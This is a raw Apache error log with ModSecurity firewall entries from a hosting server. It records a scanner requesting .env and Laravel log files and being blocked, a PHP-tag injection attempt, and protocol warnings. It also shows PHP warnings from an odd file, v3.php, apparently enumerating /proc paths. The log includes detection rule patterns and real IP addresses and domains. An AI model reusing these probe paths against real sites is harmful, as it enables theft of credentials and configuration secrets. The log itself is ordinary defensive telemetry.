[Mon May 11 20:49:45.788015 2026] [security2:error] [pid 1516058:tid 1516094] [client 195.114.15.48:54272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkySMeXtzav-mi9SyvQAAAAMQ"]
[Mon May 11 20:49:45.788031 2026] [:error] [pid 1502013:tid 1502041] [client 195.114.15.48:54462] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.788678 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.114.15.48:54368] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.development"] [unique_id "agIkyTP5Q_-MBliRCAxlHAAAABY"]
[Mon May 11 20:49:45.788871 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.114.15.48:54376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkydeaRXe5lR8y0ZORBgAAAVM"]
[Mon May 11 20:49:45.789375 2026] [:error] [pid 1501831:tid 1501853] [client 195.114.15.48:54448] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.791121 2026] [:error] [pid 1516058:tid 1516105] [client 195.114.15.48:54228] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.791206 2026] [security2:error] [pid 1501883:tid 1501908] [client 195.114.15.48:54394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyTP5Q_-MBliRCAxlGgAAABc"]
[Mon May 11 20:49:45.791493 2026] [:error] [pid 1502013:tid 1502043] [client 195.114.15.48:54316] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.791763 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.114.15.48:54340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.production"] [unique_id "agIkyTP5Q_-MBliRCAxlGwAAABg"]
[Mon May 11 20:49:45.791930 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.114.15.48:54340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.production"] [unique_id "agIkyTP5Q_-MBliRCAxlGwAAABg"]
[Mon May 11 20:49:45.792585 2026] [:error] [pid 1502013:tid 1502036] [client 195.114.15.48:54212] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.793137 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.114.15.48:54368] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyTP5Q_-MBliRCAxlHAAAABY"]
[Mon May 11 20:49:45.793893 2026] [security2:error] [pid 1501831:tid 1501856] [client 195.114.15.48:54188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/admin/.env"] [unique_id "agIkyVNddpkriGUb6ZV0rgAAARc"]
[Mon May 11 20:49:45.793907 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.114.15.48:54340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyTP5Q_-MBliRCAxlGwAAABg"]
[Mon May 11 20:49:45.794075 2026] [security2:error] [pid 1501831:tid 1501856] [client 195.114.15.48:54188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/admin/.env"] [unique_id "agIkyVNddpkriGUb6ZV0rgAAARc"]
[Mon May 11 20:49:45.794074 2026] [security2:error] [pid 1501831:tid 1501834] [client 195.114.15.48:54332] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.example"] [unique_id "agIkyVNddpkriGUb6ZV0rQAAAQE"]
[Mon May 11 20:49:45.794275 2026] [security2:error] [pid 1501831:tid 1501834] [client 195.114.15.48:54332] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.example"] [unique_id "agIkyVNddpkriGUb6ZV0rQAAAQE"]
[Mon May 11 20:49:45.794612 2026] [security2:error] [pid 1511173:tid 1511199] [client 195.114.15.48:54356] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.local"] [unique_id "agIkyfjVc-A-CSptvm1vhgAAAFc"]
[Mon May 11 20:49:45.794769 2026] [security2:error] [pid 1511173:tid 1511199] [client 195.114.15.48:54356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.local"] [unique_id "agIkyfjVc-A-CSptvm1vhgAAAFc"]
[Mon May 11 20:49:45.794922 2026] [security2:error] [pid 1534836:tid 1534870] [client 195.114.15.48:54294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.test"] [unique_id "agIkydeaRXe5lR8y0ZORBwAAAUA"]
[Mon May 11 20:49:45.795088 2026] [security2:error] [pid 1534836:tid 1534870] [client 195.114.15.48:54294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.test"] [unique_id "agIkydeaRXe5lR8y0ZORBwAAAUA"]
[Mon May 11 20:49:45.796627 2026] [security2:error] [pid 1511173:tid 1511182] [client 195.114.15.48:54210] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agIkyfjVc-A-CSptvm1vhwAAAEY"]
[Mon May 11 20:49:45.796962 2026] [security2:error] [pid 1511173:tid 1511182] [client 195.114.15.48:54210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agIkyfjVc-A-CSptvm1vhwAAAEY"]
[Mon May 11 20:49:45.797030 2026] [security2:error] [pid 1511173:tid 1511199] [client 195.114.15.48:54356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyfjVc-A-CSptvm1vhgAAAFc"]
[Mon May 11 20:49:45.797055 2026] [security2:error] [pid 1501831:tid 1501856] [client 195.114.15.48:54188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyVNddpkriGUb6ZV0rgAAARc"]
[Mon May 11 20:49:45.797223 2026] [security2:error] [pid 1501831:tid 1501834] [client 195.114.15.48:54332] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyVNddpkriGUb6ZV0rQAAAQE"]
[Mon May 11 20:49:45.798116 2026] [security2:error] [pid 1534836:tid 1534870] [client 195.114.15.48:54294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkydeaRXe5lR8y0ZORBwAAAUA"]
[Mon May 11 20:49:45.798561 2026] [security2:error] [pid 1511173:tid 1511182] [client 195.114.15.48:54210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyfjVc-A-CSptvm1vhwAAAEY"]
[Mon May 11 20:49:45.801292 2026] [:error] [pid 1534836:tid 1534877] [client 195.114.15.48:54428] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710742 2026] [:error] [pid 1534836:tid 1534877] [client 195.114.15.48:54428] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710742 2026] [:error] [pid 1501883:tid 1501899] [client 195.114.15.48:54444] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710795 2026] [:error] [pid 1511173:tid 1511179] [client 195.114.15.48:54436] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710795 2026] [:error] [pid 1511173:tid 1511199] [client 195.114.15.48:54356] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710795 2026] [:error] [pid 1516058:tid 1516094] [client 195.114.15.48:54272] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710830 2026] [:error] [pid 1502013:tid 1502036] [client 195.114.15.48:54212] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710836 2026] [:error] [pid 1516058:tid 1516105] [client 195.114.15.48:54228] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710838 2026] [:error] [pid 1502013:tid 1502043] [client 195.114.15.48:54316] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710866 2026] [:error] [pid 1501831:tid 1501834] [client 195.114.15.48:54332] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.711431 2026] [:error] [pid 1501883:tid 1501907] [client 195.114.15.48:54368] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.711457 2026] [:error] [pid 1534836:tid 1534881] [client 195.114.15.48:54268] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712048 2026] [:error] [pid 1534836:tid 1534876] [client 195.114.15.48:54422] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712123 2026] [:error] [pid 1534836:tid 1534882] [client 195.114.15.48:54252] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712170 2026] [:error] [pid 1516058:tid 1516110] [client 195.114.15.48:54176] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712196 2026] [:error] [pid 1502013:tid 1502044] [client 195.114.15.48:54198] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712202 2026] [:error] [pid 1511173:tid 1511189] [client 195.114.15.48:54180] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712259 2026] [:error] [pid 1501831:tid 1501856] [client 195.114.15.48:54188] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712347 2026] [:error] [pid 1501831:tid 1501835] [client 195.114.15.48:54408] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.710742 2026] [:error] [pid 1511173:tid 1511182] [client 195.114.15.48:54210] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712630 2026] [:error] [pid 1501883:tid 1501885] [client 195.114.15.48:54178] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712774 2026] [:error] [pid 1502013:tid 1502035] [client 195.114.15.48:54416] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.712182 2026] [:error] [pid 1501883:tid 1501909] [client 195.114.15.48:54340] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.713653 2026] [:error] [pid 1516058:tid 1516114] [client 195.114.15.48:54434] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.714024 2026] [:error] [pid 1534836:tid 1534870] [client 195.114.15.48:54294] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.714165 2026] [:error] [pid 1501831:tid 1501854] [client 195.114.15.48:54236] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:46.714624 2026] [:error] [pid 1511173:tid 1511193] [client 195.114.15.48:54282] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/56/task/56/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/56/task/56/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/56/task/56/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/56/task/56/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/56/task/56/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/56/task/56/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:50:10.483014 2026] [ssl:error] [pid 1502013:tid 1502044] (EAI 2)Name or service not known: [client 104.28.62.86:29208] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 20:50:10.483070 2026] [ssl:error] [pid 1502013:tid 1502044] AH01941: stapling_renew_response: responder error
[Mon May 11 20:50:36.623496 2026] [security2:error] [pid 1511173:tid 1511179] [client 54.84.147.79:14069] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>flash/questionnaire.php?formation. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>flash/questionnaire.php?formation: <?php echo $formationid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIk_PjVc-A-CSptvm1v3gAAAEM"]
[Mon May 11 20:50:36.624534 2026] [security2:error] [pid 1511173:tid 1511179] [client 54.84.147.79:14069] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIk_PjVc-A-CSptvm1v3gAAAEM"]
[Mon May 11 20:50:36.716390 2026] [security2:error] [pid 1511173:tid 1511179] [client 54.84.147.79:14069] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIk_PjVc-A-CSptvm1v3gAAAEM"]
[Mon May 11 20:51:10.217509 2026] [security2:error] [pid 1501883:tid 1501909] [client 43.166.253.94:56532] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/nouveau-visuel-flb/"] [unique_id "agIlHjP5Q_-MBliRCAxleAAAABg"]
[Mon May 11 20:51:24.179877 2026] [security2:error] [pid 1501883:tid 1501886] [client 43.166.226.57:42150] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIlLDP5Q_-MBliRCAxlhAAAAAE"]
[Mon May 11 20:51:53.083039 2026] [security2:error] [pid 1516058:tid 1516099] [client 43.155.195.141:41380] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agIlSSMeXtzav-mi9SyvzQAAAMk"], referer: http://www.missmandarine.com
[Mon May 11 20:53:26.006533 2026] [security2:error] [pid 1516058:tid 1516091] [client 101.32.128.28:49144] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/xmlrpc.php"] [unique_id "agIlpiMeXtzav-mi9SywXAAAAME"]
[Mon May 11 20:55:33.397871 2026] [security2:error] [pid 1511173:tid 1511200] [client 43.134.1.185:40276] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/ingenierie-financiere-et-financement/"] [unique_id "agImJfjVc-A-CSptvm1xAgAAAFg"]
